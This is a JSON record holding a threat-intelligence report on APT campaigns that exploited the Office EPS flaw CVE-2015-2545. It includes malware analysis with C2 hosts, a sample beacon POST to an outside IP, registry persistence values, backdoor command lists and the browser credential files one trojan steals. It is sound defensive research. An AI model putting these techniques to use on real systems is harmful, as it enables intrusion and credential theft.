{
	"id": "ed537e15-e3de-44bf-a77d-9f67c5a3b06a",
	"created_at": "2026-04-06T00:12:09.772082Z",
	"updated_at": "2026-04-10T03:35:34.304408Z",
	"deleted_at": null,
	"sha1_hash": "5f5a871c3a384effc66df7cba9103f909f1901ab",
	"title": "CVE-2015-2545: overview of current threats",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4686688,
	"plain_text": "CVE-2015-2545: overview of current threats\r\nBy GReAT\r\nPublished: 2016-05-25 · Archived: 2026-04-05 12:40:33 UTC\r\nCVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099. The vulnerability affects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1.\r\nThe error enables an attacker to execute arbitrary code using a specially crafted EPS image file. The exploit uses PostScript and can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods.\r\nThe exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East.\r\nIn this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups.\r\nOverview of groups using CVE-2015-2545\r\nPlatinum (also known as TwoForOne)\r\nThe group is believed to originate from South-East Asia. Its attacks can be traced as far back as 2009. The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India.\r\nThis group was the first to exploit the CVE-2015-2545 vulnerability. 
After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected.\r\nMicrosoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia.\r\nAPT16\r\nThe group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan. These attacks were described in a FireEye research paper – The EPS Awakens – Part 2 (https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html).\r\nEvilPost\r\nIn December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated Postscript) object. The EPS object contained a shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture. This, in turn, exploited another vulnerability to elevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C\u0026C server.\r\nThe C\u0026C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. 
We believe the attackers either lost access to the server or realized that it resulted in too much attention from security researchers, as the attack was widely discussed by the Japanese security community.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 1 of 21\n\nAccording to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.\r\nThis document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word.\r\nEven with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message. The document is written in good Japanese, as shown below.\r\nThe decoy presents New Year impressions of defense-related organizations.\r\nThis attack was also described in the FireEye report (https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html), mentioned above.\r\nAn overview of the EvilPost group’s activity was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016. For information about the service, please write to intelreports@kaspersky.com.\r\nSPIVY\r\nIn March and April 2016, a series of emails laced with an exploit for CVE-2015-2545 were detected. The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong. Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived). A description of these incidents can be found in the PaloAlto blog.\r\nDanti and SVCMONDR\r\nThese two groups have not yet been publicly described. 
An overview of their attacks and the tools used is provided in this report.\r\nDanti attacks\r\nDanti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations. According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.\r\nThe group ran a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode. In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office. The exploit is based on a malformed embedded EPS (Encapsulated Postscript) object. This contains the shellcode that drops a backdoor, providing full access to the attackers.\r\nMain findings:\r\nDanti, a previously unknown group, is probably related to NetTraveller and DragonOK\r\nIn February-March 2016 the group was observed using CVE-2015-2545\r\nIt remains active, conducting attacks against Indian diplomatic organizations\r\nRelated attacks have been observed against Central and South East Asian targets\r\nThe campaign leveraging the exploit for CVE-2015-2545 took place in February 2016. As a result, several emails with attached DOCX files were uploaded to VirusTotal. 
The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:\r\ndsfsi@nic.in, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG), dsfsi@mea.gov.in)\r\nchumarpost@gmail.com, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as the Indian Ministry of Foreign Affairs – vastuXX.nic.in)\r\nchancery@indianembassy.hu, the Indian embassy in Hungary\r\namb.copenhagen@mea.gov.in, the Indian embassy in Denmark\r\namb.bogota@mea.gov.in, the Indian embassy in Colombia\r\nAll these attacks took place between the 2nd and 29th of February, 2016.\r\nTarget and date | Attachment name | Sender\r\nIndian embassy in Hungary, 2nd February | Mission List.doc | unknown (original email was forwarded)\r\nIndian embassy in Denmark, 2nd February | HQ List.doc | mout.gmx.com ([74.208.4.200])\r\nIndian embassy in Colombia, 2nd February | HQ List.doc | mout.gmx.com ([74.208.4.201])\r\nDSFSI, 24th February | India’s 10 Top Luxury Hotels.doc | 191.96.111.195 via mout.gmx.com ([74.208.4.201])\r\nChumarpost, 29th February | India’s 10 Top Luxury Hotels.doc | 43.227.113.129 via mout.gmx.com ([74.208.4.200])\r\nIn the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to VirusTotal.\r\nInitial vector\r\nThe emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program. In all known cases, the sender used the same gate at 74.208.4.200/74.208.4.201 (mout.gmx.com).\r\nThe email messages changed for different waves of the campaign. 
When the campaign started on February 2nd, the emails carried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender.\r\nOriginal message used in the first wave of attacks\r\nAs can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications \u0026 Information Technology.\r\nMission List decoy document\r\nAt the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia):\r\nOriginal HQ List email\r\nK. Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T\u0026C) at the Embassy of India in China.\r\nHQ List decoy document\r\nBoth files (“Mission List” and “HQ List”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1).\r\nInterestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets.\r\nFor the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender.\r\nTop Luxury Hotels spear-phishing email\r\nThis new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.\r\nTop 10 Luxury Hotels decoy document\r\nThe text of the document was copied from a Forbes article published in 2007. 
According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks.\r\nHowever, the same mail gate (mout.gmx.com) was used as for the 2nd February attacks.\r\nEmail header from February 29\r\nEmail header from February 24\r\nAll the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS. The structure of the WAF files is the same in all three cases:\r\nWeb archive structure\r\nExploit\r\nThe attackers used at least one known 1-day exploit: the exploit for CVE-2015-2545, an EPS parsing vulnerability in the EPSIMP32.FLT module, reported by FireEye and patched by Microsoft on 8 September 2015 with MS15-099.\r\nWe are currently aware of about four different variants of the exploit.\r\nThe original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.\r\nOriginal EPS exploit, used in August 2015\r\nThe second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016. This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015. The second variant is easily recognized by the specific strings in its EPS shellcode:\r\nThe “h:\\test.txt” string could have been forgotten by the exploit developer\r\nThe third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization. 
This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT:\r\nCan be recognized by the “add2 \u003ceb135” substring\r\nIn the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the files.\r\nIn the third variant, the binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda).\r\nEncrypted data at the end of the eps file\r\nThe decryption function is a 1-byte XOR with a key from “\\x00” to “\\xff” and replacement of the odd byte with an even byte in several hundred bytes from the header.\r\nDecrypted exe file\r\nDecrypted decoy document\r\nWe detected a few different EPS objects in the exploit and these are analyzed below. The fourth variant of the exploit is analyzed in the “March attack” section.\r\nRead more about EPS objects and Payload in the Appendix.\r\nMarch attack\r\nAt the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th several malicious documents were sent to various recipients at the Cabinet Secretariat of the Government of India from the email account of Ms. Richa Gaharwar (\u003cricha.gaharwar@nic.in\u003e), Deputy Secretary at the Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.\r\nEmail sent from the account of Ms. Richa Gaharwar\r\nThe message was sent from an internal IP address using Oracle Communications Messenger. 
This could mean that the employee workstation used to send the malicious emails had been fully compromised.\r\nEmail header\r\nThe attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit. This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:\r\nThey removed the part with the “h:\\test.txt” strings\r\nThey added the binary at the end of the EPS object (the same as in the third variant of the exploit)\r\nInstead of using the “PdPD” string as a marker for the binary, they used a new identifier: “1111111122222222”\r\nNew identifier used\r\nAll these changes created a new variant of the exploit, detected by very few antivirus products.\r\nThe decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack.\r\nDecoy document\r\nAccording to its metadata, the document was created and modified by Chinese users:\r\nDecoy’s metadata\r\nMarch attack – payload\r\nThe dropped file is a RarSFX archive (331307 bytes). According to comments in the archive, this was also created by a Chinese user:\r\nThe dropper installs four files in the system. The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\\windows\\memstatus.txt”.\r\nThe main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication. 
The file is signed with a legitimate signature from “Daum Communications Corp.”\r\nDigital signature information\r\nThis legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb”). This, in turn, executes appinfo.dat (the hardcoded PDB path inside is “D:\\BaiduYunDownload\\ServiceExe\\Release\\ServiceExe.pdb”), which is a Yoda-compressed binary. The backdoor code is stored inside update.dat.\r\nThe potplayer.dll “PreprocessCmdLineEx” export function:\r\nCreates a service named “MemoryStatus” with a path to the “appinfo.dat” file and sets it in HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with the name “potplayer”.\r\nOpens the “update.dat” file, decrypts it with xor operations and passes execution to the resulting buffer.\r\n“update.dat”, a backdoor:\r\nMakes its first GET request to the hardcoded CnC “newsupdate.dynssl.com/index.html” in order to get the new CnC in the response.\r\nIf a 407 response code is returned (Proxy authentication required) then the sample sends the request again with the “proxyname” string as the proxy username and the “proxypass” string as the proxy password. 
This suggests that the sample may have been compiled using a builder where these parameters must be set manually, and that in this specific sample they were not changed from the defaults.\r\nFinds the “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES in CTR mode three times with three 16-byte keys.\r\nMakes a POST request to the new CnC with the “im=validate” URL parameter and expects the “success” string as the response.\r\nForms the following structure in order to send it to the CnC in a POST request after AES encryption:\r\n“CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string\r\nLocal IP\r\nHost name\r\n0x3E9 dword\r\nOS version\r\nSYSTEM_INFO structure\r\nDecrypts the response using AES with one key.\r\nCommands:\r\nLists files in directory\r\nEnumerates drives and their type\r\nEnumerates given registry key and value\r\nEnumerates processes\r\nDeletes given file\r\nCreates given process\r\nMoves or copies given file\r\nUploads file\r\nWrites to file and launches it\r\nEnumerates services\r\nTerminates given process\r\nProvides shell via cmd.exe\r\nThe malware connects to the following C2s:\r\nnewsupdate.dynssl.com (103.61.136.120)\r\ndnsnews.dns05.com (118.193.12.252)\r\nThe connection:\r\nThe two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.\r\nSVCMONDR: the Taiwan case\r\nIn December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. 
On 11 December, a spear-phishing email was sent by the attackers to an employee of a Taiwanese security software reseller.\r\nSpear-phishing email\r\nThe attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.\r\n“1-3說明檔.doc”\r\nThis EPS (98c57aa9c7e3f90c4eb4afeba8128484) exploits CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same as seen in the Danti attacks.\r\nThe structure of the Web Archive also carries references to the same files as the Danti group (image002.gif and “image002.eps”). However, the files themselves are absent from the archive.\r\nPart of the Web Archive\r\nThis resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code. That’s why we are noting this incident separately from the Danti group’s activity.\r\nInterestingly, in the first few days of December, another group – APT16 (FireEye’s classification) – also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER (https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html).\r\nAfter opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b).\r\nThis queries the registry keys “HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings” and “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings” and compares the values. 
If they don’t coincide, it sets the “DefaultConnectionSettings” value from the HKEY_USERS key to the HKCU key.\r\nIt sets values taken from:\r\n1. HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\{A8A88C49-5EB2-4990-A1A2-0876022C854F}\r\n2. HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\{AEBA21FA-782A-4A90-978D-B72164C80120}\r\n3. HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1A10\r\nto the appropriate HKCU key (for example: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\{A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.).\r\nThen it forms the structure in order to send it to the CnC in a POST request with the following fields:\r\n0x8888 constant\r\n0x8000 constant\r\n18-byte hex string based on the CoCreateGuid function\r\nLocal IP\r\nMAC address\r\nIt encodes the resulting structure with base64. Example of a POST request:\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\nHost: 59.188.13.204:9080\r\nContent-Length: 112\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nAAAAAIiIAAAAgAAAAAAAAGQwNTRlYTkxMDAwMGEyZmU3NAAAAAAAAAAAAAAAAAAAMTAuNjMuMTIuNAAAAAAAADAwMEM\r\nBased on the CnC response, the sample:\r\nChecks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure. If the password is valid, it sets a “certified” flag and can further process the following commands.\r\nLaunches the given command line with ShellExecute, writes the output to a %tmp% file, sends the results to the CnC and deletes the file.\r\nDownloads file to %Temp% folder.\r\nUploads given file to CnC.\r\nSets sleep interval.\r\nAll results sent to the CnC after processing commands are encrypted with RC4 using the MAC address as the key.\r\nThe CnC points to an IP address in Hong Kong. 
This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware.\r\nThe CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (59.188.0.197, accounts.serveftp.com).\r\nIn general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command \u0026 control servers/proxies.\r\nAnother detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries. According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda).\r\nThe latest known activity of “admin@338” was in August 2015, when it targeted Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP.\r\nHowever, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda.\r\nAccording to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.\r\nConclusions\r\nWe are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti.\r\nThese groups have their own toolsets of malicious programs. Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum. 
All groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA.\r\nThe TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports.\r\nDanti is highly focused on diplomatic entities. It may already have full access to internal networks in Indian government structures. According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.\r\nDespite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections. A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK.\r\nThe use of CVE-2015-2545 exploits is on the rise. In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016. Such attacks mostly target financial institutions in Asia. Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia. There are reasons to believe that Nigerian cybercriminals are behind these attacks. 
In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan.\r\nWe expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region.\r\nTo learn more about how best to address known vulnerabilities, read this post in the Kaspersky Business Blog.\r\nAdditional references:\r\nThe EPS Awakens\r\nPart 1\r\nPart 2: https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html\r\nUnit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets\r\nNew Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists\r\nMicrosoft research “Platinum”\r\nEvilPost attacks (Kaspersky Lab Private Report, March 2016)\r\nAppendix A: EPS objects, their payload and http.exe trojan analysis\r\nEPS Objects\r\nFile MD5: a90a329335fa0af64d8394b28e0f86c1\r\nFile type: Encapsulated Postscript File\r\nSize: 189’238 bytes\r\nFile Name: image001.eps (from HQ list)\r\nThis EPS file contains a shellcode that decrypts and saves the file “lsass.exe” and the decoy document to disk. The dropped malicious files are described below.\r\nFile MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5\r\nFile type: Encapsulated Postscript File\r\nSize: 211’766 bytes\r\nFile Name: image001.eps (from Mission list)\r\nThis EPS file contains a shellcode that decrypts and saves the file “lsass.exe” and the decoy document to disk. The dropped malicious files are described below.\r\nFile MD5: b751323586c5e36d1d644ab42888a100\r\nFile type: Encapsulated Postscript File\r\nSize: 398’648 bytes\r\nFile Name: image001.eps (from India’s 10 Top Luxury Hotels)\r\nThis EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and the decoy document to disk. The dropper and the dropped malicious file “http.exe” are described below.\r\nPayload analysis\r\nBackdoor\r\nFile Name: lsass.exe\r\nMD5: 8ad9cb6b948bcf7f9211887e0cf6f02a\r\nFile type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit\r\nCompilation timestamp: 2015-12-28 07:47:54\r\nPE Resources: BIN (CHINESE SIMPLIFIED)\r\nSize: 138’240 bytes\r\nURL: http://goback.strangled[.]net:443/[random string]\r\nTYPE: POST\r\nUSER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nReal IP: 180.150.227.135:443\r\nDrops a file from its resource section to %ALLUSERSPROFILE%\\IEHelper\\mshtml.dll. The backdoor then writes a string to a given offset with a value dependent on the %ALLUSERSPROFILE% environment variable. Thus, the MD5 of the dropped file can vary. Examples of MD5s with standard variables:\r\nbe0cc8411c066eac246097045b73c282\r\nbae673964e9bc2a45ebcc667895104ef\r\nSets registry:\r\nIf user is not admin:\r\n“HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\\Windows\\System32\\rundll32.exe %ALLUSERSPROFILE%\\IEHelper\\mshtml.dll, IEHelper”\r\nIn any case:\r\n“HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Active Setup\\Installed Components\\{53372C34-A872-FACF-70A7-A23C81C766C4}” value “StubPath” = “C:\\Windows\\System32\\rundll32.exe %ALLUSERSPROFILE%\\IEHelper\\mshtml.dll, IEHelper”\r\nSets the following values before creating the instance of IE for communicating with the CnC:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main DisableFirstRunCustomize=1\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main Check_Associations=”no”\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Internet Connection Wizard Completed=1\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap IEHarden=0\r\nCollects the following info, encodes it with base64 and sends it to the CnC:\r\nMemory status\r\nOS version\r\nUser name\r\nOEM code page identifier\r\nLocal IP\r\nCPU speed\r\nForms the following body in the POST request to the CnC:\r\n----=_Part_%x\r\nContent-Disposition: form-data; name=”m1.jpg”\r\nContent-Type: application/octet-steam\r\n%base64%\r\n----=_Part_%x\r\nwhere %x is the adapter’s MAC address, decrypted with an xor operation.\r\nThe URL path in the POST request is generated randomly with uppercase letters.\r\nExample of CnC communication:\r\nBased on the CnC response, the sample:\r\nProvides shell via cmd.exe\r\nCreates directory\r\nLists files in directory\r\nDeletes file\r\nUploads given file to CnC\r\nEnumerates drives, gets their type and available space\r\nLaunches given file\r\nMoves file\r\nWrites and appends to given file\r\nUninstalls itself\r\nFile Name: mshtml.dll\r\nMD5: be0cc8411c066eac246097045b73c282 or bae673964e9bc2a45ebcc667895104ef or different\r\nFile type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit\r\nCompilation timestamp: 2015-12-28 07:45:20\r\nSize: 72’192 bytes\r\nmshtml.dll entirely repeats the functionality of its dropper (CnC communication and command processing) in its “IEhelper” export and is built on the same source code.\r\nhttp.exe trojan\r\nDropper MD5: 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT\r\nDrops a file to %Temp%\\IXP000.TMP\\http.exe and launches it.\r\nFilename: http.exe\r\nMD5: 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GMT\r\nCnC: carwiseplot.no-ip.org/news/news.asp\r\nSets registry:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run “IME_hp” = %ALLUSERPROFILE%\\Accessories\\wordpade.exe\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run “IME_hp” = %ALLUSERPROFILE%\\Accessories\\wordpade.exe\r\nHKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run “IME_hp” = %ALLUSERPROFILE%\\Accessories\\wordpade.exe\r\nCopies itself to %ALLUSERPROFILE%\\Accessories\\wordpade.exe, launches it and exits its own process.\r\nThe wordpade.exe file then proceeds:\r\nCreates mutex “Global\\wordIE”. Stores keystrokes and window titles to %Temp%\\dumps.dat and xors it with 0x99.\r\nKnocks to the CnC via an IE instance: carwiseplot.no-ip.org/news/news.asp\r\nIncludes the following field in the HTTP header:\r\nCookie: ID=1%x, where %x is the Volume Serial Number of disk C\r\nBased on the CnC response, the sample:\r\nProvides shell via cmd.exe\r\nLists files in all drives and writes to given file\r\nRetrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file\r\nWrites to given file\r\nDeletes given file\r\nUploads given file to CnC\r\nMakes screenshots and writes to file %Temp%\\makescr.dat\r\nRetrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data), Microsoft WinInet storage, Microsoft Outlook\r\nAppendix B: Danti sample hashes\r\nAppendix C: sample hashes of SVCMONDR attacks\r\nSource: https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/"
	],
	"report_names": [
		"cve-2015-2545-overview-of-current-threats"
	],
	"threat_actors": [
		{
			"id": "2608db3e-7f7a-42c0-922b-4c9cb22c7ce9",
			"created_at": "2023-01-06T13:46:38.278691Z",
			"updated_at": "2026-04-10T02:00:02.90849Z",
			"deleted_at": null,
			"main_name": "APT16",
			"aliases": [
				"SVCMONDR",
				"G0023"
			],
			"source_name": "MISPGALAXY:APT16",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0",
			"created_at": "2023-01-06T13:46:38.469688Z",
			"updated_at": "2026-04-10T02:00:02.987949Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Moafee",
				"BRONZE OVERBROOK",
				"G0017",
				"G0002",
				"Shallow Taurus"
			],
			"source_name": "MISPGALAXY:DragonOK",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2d7530f9-cd8e-4703-8aed-ab938e3b08cf",
			"created_at": "2023-01-06T13:46:38.620662Z",
			"updated_at": "2026-04-10T02:00:03.04163Z",
			"deleted_at": null,
			"main_name": "Danti",
			"aliases": [],
			"source_name": "MISPGALAXY:Danti",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fda88fa-7c1f-4e84-b3c8-56f73f21aaf5",
			"created_at": "2022-10-25T16:07:24.147011Z",
			"updated_at": "2026-04-10T02:00:04.881289Z",
			"deleted_at": null,
			"main_name": "Samurai Panda",
			"aliases": [],
			"source_name": "ETDA:Samurai Panda",
			"tools": [
				"Agent.dhwf",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Getkys",
				"IsSpace",
				"KABOB",
				"Kaba",
				"Korplug",
				"NfLog RAT",
				"PlugX",
				"Poldat",
				"RedDelta",
				"Sogu",
				"Sykipot",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Wkysol",
				"Xamtrav",
				"Zlib",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fed3d66d-1721-43b0-b5e1-d35931dc6e71",
			"created_at": "2022-10-25T15:50:23.72724Z",
			"updated_at": "2026-04-10T02:00:05.411885Z",
			"deleted_at": null,
			"main_name": "APT16",
			"aliases": [
				"APT16"
			],
			"source_name": "MITRE:APT16",
			"tools": [
				"ELMER"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28",
			"created_at": "2022-10-25T15:50:23.78829Z",
			"updated_at": "2026-04-10T02:00:05.415039Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"DragonOK"
			],
			"source_name": "MITRE:DragonOK",
			"tools": [
				"PoisonIvy",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9d6f666e-3a9d-4a09-bcac-8aee96572827",
			"created_at": "2022-10-25T15:50:23.2832Z",
			"updated_at": "2026-04-10T02:00:05.268714Z",
			"deleted_at": null,
			"main_name": "admin@338",
			"aliases": [
				"admin@338"
			],
			"source_name": "MITRE:admin@338",
			"tools": [
				"BUBBLEWRAP",
				"LOWBALL",
				"Systeminfo",
				"PoisonIvy",
				"netstat",
				"ipconfig"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4",
			"created_at": "2023-01-06T13:46:38.595679Z",
			"updated_at": "2026-04-10T02:00:03.033762Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"TwoForOne",
				"G0068",
				"ATK33"
			],
